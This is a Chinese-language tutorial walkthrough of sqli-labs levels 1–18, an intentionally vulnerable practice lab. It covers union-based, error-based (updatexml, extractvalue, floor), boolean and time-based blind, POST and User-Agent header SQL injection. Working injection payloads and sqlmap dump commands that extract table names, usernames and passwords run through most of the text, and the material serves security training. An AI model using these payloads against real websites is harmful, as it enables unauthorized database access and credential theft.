SQL注入复现1-18关

news2025/1/11 20:58:09

一、联合查询(1-4关)

首先打开第一关查看源代码,他的闭合方式为'

找到闭合方式后,我们就可以使用order by来确定列数

我们可以看到使用order by 4--+回车时报错,使用order by 3--+时显示,所以我们就得到他得列数为3列。

判断完列数之后,可以用union进行查询了,我们使用-1' union select 1,2,3--+查询

注意:因为页面只能显示一个内容,第二句(即union 后面的内容)是不显示的,可以把第一句(id=1)的内容改成数据库不存在的数据,如id=-1

我们可以选择在2或3出进行注入,成功得到数据库名称

我们可以使用information_schema得到表名列名

information_schema:包含所有MySql数据库的简要信息,其中包含两个重要数据表tablescolumns

查询语句:-1' union select 1,table_name,3 from information_schema.tables where table_schema='security'--+

可以看到已经查询出来表名,但是只查出一个,我们可以使用group_concat(),确保所有查询信息能放到一行显示出来

-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security'--+

同理查出数据库security中数据表users的列名,我们只需要将table改为column同时加上我们已经知道的表名即可

查询语句:-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users'--+

查找数据表users中的所有username和password

查询语句:-1' union select 1,group_concat(username,':',password),3 from users--+

因为2-4相比第一关只是改变闭合方式这里就不在多说。

二、报错注入(5,6关)

报错注入共有7大函数,常用的有三个(updatexml,extractvalue,floor)解析xml文档,报错注入不能用union联合查询,要用and连接,用concat连接起来

打开第五关,先看源代码

可以看到和前几关有所不同,如果查询成功,他不会回显出来只会显示You are in...........

但是使用一个错误的函数名时,他会报错,并且显示出正确的数据库名

1.updatexml函数

一共可以接收三个参数,报错位置在第二个参数

 1' and updatexml(1,concat('~',(select database()),'~'),1)--+

后面的查数据库中的表名,列明基本和1-4关一样,就不在演示

需要注意:报错注入最大只能容纳32个字节可以用limit0,1分段显示使用substring截取

1' and updatexml(1,concat('~',(select substring(database()) 1,32),'~'),1)--+

查询表:1' and updatexml(1,concat('~',substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31)),3)--+

查询列:1' and updatexml(1,concat('~',substring((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31)),3)--+

用户名,密码:1' and updatexml(1,concat('~',substring((select group_concat(username,':',password) from users),1,31)),3)--+  

2.extractvalue函数

一共可以接收两个参数,报错位置在第二个参数

查询语句:1' and extractvalue(1,concat('~',(select database()),'~'))--+

查询别的数据只需要更改(select database())里面的语句即可

查询表:1' and extractvalue(1,concat('~',substring((select group_concat(table_name) from information_schema.tables where table_schema='security'),1,31)))--+

查询列:1' and extractvalue(1,concat('~',substring((select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users'),1,31)))--+

用户名,密码:1' and extractvalue(1,concat('~',substring((select group_concat(username,':',password) from users),1,31)))--+

3.floor()报错注入(适用于8.x>mysql>5.0)

利用 select count(),(floor(rand(0)2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。

共四个函数(关键字)缺一不可 :

rand():随机返回0-1间的小数

floor():小数向下取整,向上是ceiling()

concat_ws(,,):将括号内数据用第一个字段连接起来

group by():分组

查询数据库名:1' and (select 1 from (select count(*), concat(database(), floor(rand(0) * 2)) as x from information_schema.tables group by x) as y)--+

查询表:1' and (select 1 from (select count(*),concat('~',(select group_concat(table_name) from information_schema.tables where table_schema='security' ),'~',floor(rand(0)*2)) as x from information_schema.tables group by x) as y)--+

查询列:1' and (select 1 from (select count(*),concat('~',(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' ),'~',floor(rand(0)*2)) as x from information_schema.columns group by x) as y)--+

查询用户名,密码:1' and (select 1 from (select count(*),concat('~',substring((select group_concat(username,':',password) from users),1,31),'~',floor(rand(0)*2)) as x from users group by x) as y)--+

第六关和第五关一样,只是闭合方式不同

三、盲注(8-10关)

1.布尔盲注

打开第八关发现,注入成功显示You are in...........,失败则不显示。没有报错回显,不知道数据库具体返回值的情况下,使用布尔盲注对数据库中的内容进行猜解,施行SQL注入

关键函数:

ascii():可以将括号内的第一个字符转化为数字,之后和后面你写的数字进行比较,来猜是哪个字母

ascii(substr((select database()),1,1))>=100 一般这样使用 substr(,2,1)用来控制转化第几个字母,要改变中间的数字

手工注入

1' and ascii(substr(database(),1,1))>100--+

1' and ascii(substr(database(),1,1))>115--+

表示猜对了,115对应的字母就是数据库的第一个字母

也可以使用python脚本

使用sqlmap

sqlmap -u “http://..............”-D security --tables 检测表

sqlmap -u “http://..............”-D security -T users --columns 检测列

sqlmap -u “http://..............”-D security -T users --dump -C “username,password”导出数据

2.时间盲注

第九关的web页面只返回一个正常页面,利用页面响应时间不同,逐个猜解数据

使用if (条件, 条件为真执行的语句,条件为假执行的语句):将比较大小放在条件上面即可查询

1' and if(ascii(substr(database(),1,1))>100, sleep(3), 0)--+

页面等待3秒后才刷新

1' and if(ascii(substr(database(),1,1))>115, sleep(3), 0)--+

页面直接执行,表名115对应的字母就是数据库的第一个字母

也可以使用python脚本和sqlmap

第十关也是闭合方式不同也就不过多说

四、post传参

11,12关和第一关差不多,只是从get传参变为post传参

1' union select 1,database()#

13,14关为报错注入和5,6关一样只是变了传参方式

aaa') and updatexml(1,concat('~',(select database()),'~'),1)--+

15,16关为盲注,和8-10关一样

查看代码发现页面返回两种结果

1' and ascii(substr(database(),1,1))>115--+

过滤

第十七关,查看代码发现username被过滤

在password出注入同样使用报错注入

1' and updatexml(1,concat('~',(select database()),'~'),1)--+

爆出数据库名

和之前一样

第18关通过查看代码发现,username和password都被过滤

但是我们通过代码发现

HTTP_USER_AGENT  --浏览器的版本

REMOTE_ADDR  --客户端的IP地址

因为这块没有被过滤,可以从这里注入

使用burpsuite抓包

这一关模仿的是可以在网站先注册账号密码,所以我们这边先打开电脑代理,然后输入正确的账号密码,使用burpsuite抓包,最后在返回页面点击Submit

进入上图页面,右键Send to Repeater

在User-Agent出注入,点击Send可以查看网页情况

使用报错注入

aaa' and updatexml(1,concat(0x7e,database(),0x7e),1) and '1'='1

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1982331.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

微信丨QQ丨TIM防撤回工具

适用于 Windows 下 PC 版微信/QQ/TIM的防撤回补丁。支持最新版微信/QQ/TIM,其中微信能够选择安装多开功能。微信防撤回信息! 「防撤回」来自UC网盘分享https://drive.uc.cn/s/95f9aabbc9684

2024年起重机司机(限桥式起重机)证模拟考试题库及起重机司机(限桥式起重机)理论考试试题

题库来源:安全生产模拟考试一点通公众号小程序 2024年起重机司机(限桥式起重机)证模拟考试题库及起重机司机(限桥式起重机)理论考试试题是由安全生产模拟考试一点通提供,起重机司机(限桥式起重机)证模拟考试题库是根据起重机司机(限桥式起重机)最新版教…

elasticsearch教程

1. 单点部署(rpm): #提前关闭firewalld,否则无法组建集群 #1. 下载ES rpm包 ]# https://www.elastic.co/cn/downloads #2. 安装es ]# rpm -ivh elasticsearch-7.17.5-x86_64.rpm #3. 调整内核参数(太低的话es会启动报错) echo "vm.max_map_count655360 fs.file-max 655…

MySQL1 DDL语言

安装与配置 官网: MySQL :: Download MySQL Installer 阿里云: MySQL8 https://www.alipan.com/s/auhN4pTqpRp 点击链接保存,或者复制本段内容,打开「阿里云盘」APP ,无需下载极速在线查看,视频原画倍速…

外卖项目day14(day11)---数据统计

Apache ECharts 大家可以看我这篇文章: Apache ECharts-CSDN博客 营业额统计 产品原型 接口设计 新建admin/ReportController /*** 数据统计相关接口*/ RestController RequestMapping("/admin/report") Api(tags "数据统计相关接口") Slf…

快速解密哈希算法利器Hasher:解密MD5、SHA256、SHA512、RIPEMD160等最佳工具

文章目录 一、工具概述1.1主要功能点1.2 支持多种哈希算法 二、安装方法三、使用教程四、结语 一、工具概述 Hasher 是一个哈希破解工具,支持多达 7 种类型的哈希算法,包括 MD4、MD5、SHA1、SHA224、SHA256、SHA384、SHA512 等。它具有自动检测哈希类型、支持 Windows 和 Linux…

浙大阿里联合开源AudioLCM,在通用音频合成领域实现潜在一致性模型的新突破...

文本到通用音频生成(Text-to-Audio Generation,简称 TTA)作为生成任务的一个子领域,涵盖了音效创作、音乐创作和合成语音,具有广泛的应用潜力。在此前的神经 TTA 模型中,潜在扩散模型(Latent Di…

【RHEL7】无人值守安装系统

目录 一、kickstart服务 1.下载kickstart 2.启动图形制作工具 3.选择设置 4.查看生成的文件 5.修改ks.cfg文件 二、HTTP服务 1.下载HTTP服务 2.启动HTTP服务 3.将挂载文件和ks.cfg放在HTTP默认目录下 4.测试HTTP服务 三、PXE 1.查看pxe需要安装什么 2.安装 四、…

批量按照原图片名排序修改图片格式为00000001.png(附代码)

💪 专业从事且热爱图像处理,图像处理专栏更新如下👇: 📝《图像去噪》 📝《超分辨率重建》 📝《语义分割》 📝《风格迁移》 📝《目标检测》 📝《暗光增强》 &a…

ARMxy工控机使用Node-Red教程:安装工具和依赖(2)

2.3 工具安装 Node-Red 安装过程需要用到网络。请通过网线将设备千兆网口 ETH1 连接至互联网,确保可正常访问互联网。 Node-Red 是一个基于Node的可视化编程工具,因此需要先安装Node。为了便于测试,我司提供的 node-v16.14.0-linux-arm64.t…

原神升级计划数据表:4个倒计时可以修改提示信息和时间,可以点击等级、命座、天赋、备注进行修改。

<!DOCTYPE html> <html lang"zh-CN"><head><meta charset"UTF-8"><title>原神倒计时</title><style>* {margin: 0;padding: 0;box-sizing: border-box;body {background: #0b1b2c;}}header {width: 100vw;heigh…

「队列」实现FIFO队列(先进先出队列|queue)的功能 / 手撕数据结构(C++)

概述 队列&#xff0c;是一种基本的数据结构&#xff0c;也是一种数据适配器。它在底层上以链表方法实现。 队列的显著特点是他的添加元素与删除元素操作&#xff1a;先加入的元素总是被先弹出。 一个队列应该应该是这样的&#xff1a; --------------QUEUE-------------——…

大数据资源平台建设可行性研究方案(58页PPT)

方案介绍: 在当今信息化高速发展的时代&#xff0c;大数据已成为推动各行各业创新与转型的关键力量。为了充分利用大数据的潜在价值&#xff0c;构建一个高效、安全、可扩展的大数据资源平台显得尤为重要。通过本方案的实施企业可以显著提升数据处理能力、优化资源配置、促进业…

SQL注入实例(sqli-labs/less-8)

0、初始页面 1、确定闭合字符 ?id1 and 11 ?id1 and 12 ?id1 ?id1 and 11 -- ?id1 and 12 -- 确定闭合字符为单引号&#xff0c;并且正确页面与错误页面的显示不同 2、爆库名 使用python脚本 def inject_database1(url):name for i in range(1, 20):low 32high 1…

【大模型从入门到精通5】openAI API高级内容审核-1

这里写目录标题 高级内容审核利用 OpenAI 内容审核 API 的高级内容审核技术整合与实施使用自定义规则增强审核综合示例防止提示注入的策略使用分隔符隔离命令理解分隔符使用分隔符实现命令隔离 高级内容审核 利用 OpenAI 内容审核 API 的高级内容审核技术 OpenAI 内容审核 AP…

SQL注入漏洞复现1

一、靶场信息 sqli-labs下载&#xff1a;https://github.com/Audi-1/sqli-labs phpstudy下载地址&#xff1a;http://down.php.cn/PhpStudy20180211.zip 我是在本地安装小皮搭建环境&#xff0c;相比于在服务器上搭建环境&#xff0c;更加简单 二、注入实操 Less-1 爆库名…

搭建高可用OpenStack(Queen版)集群(三)之部署认证管理服务(Keystone)控制节点集群

一、搭建高可用OpenStack&#xff08;Queen版&#xff09;集群之部署认证服务&#xff08;Keystone&#xff09;控制节点集群 一、Identity 服务简介 1、Identity概述 Identity为认证管理&#xff0c;授权管理和服务目录服务管理提供单点整合。其它Openstack服务将身份认证服务…

常用的图像增强操作

我们将介绍如何用PIL库实现一些简单的图像增强方法。 [!NOTE] 初始化配置 import numpy as np from PIL import Image, ImageOps, ImageEnhance import warningswarnings.filterwarnings(ignore) IMAGE_SIZE 640[!important] 辅助函数 主要用于控制增强幅度 def int_param…

centos7.9升级rocky

ELevate Quickstart Guide | AlmaLinux Wiki 将 CentOS 7 升级到 AlmaLinux 9 由于 Leapp 工具设计为执行一步升级&#xff0c;为了将您的 CentOS 7 机器升级到 AlmaLinux 9&#xff0c;您需要拆分升级过程&#xff1a; CentOS 7 到 AlmaLinux 8AlmaLinux 8 到 AlmaLinux 9 …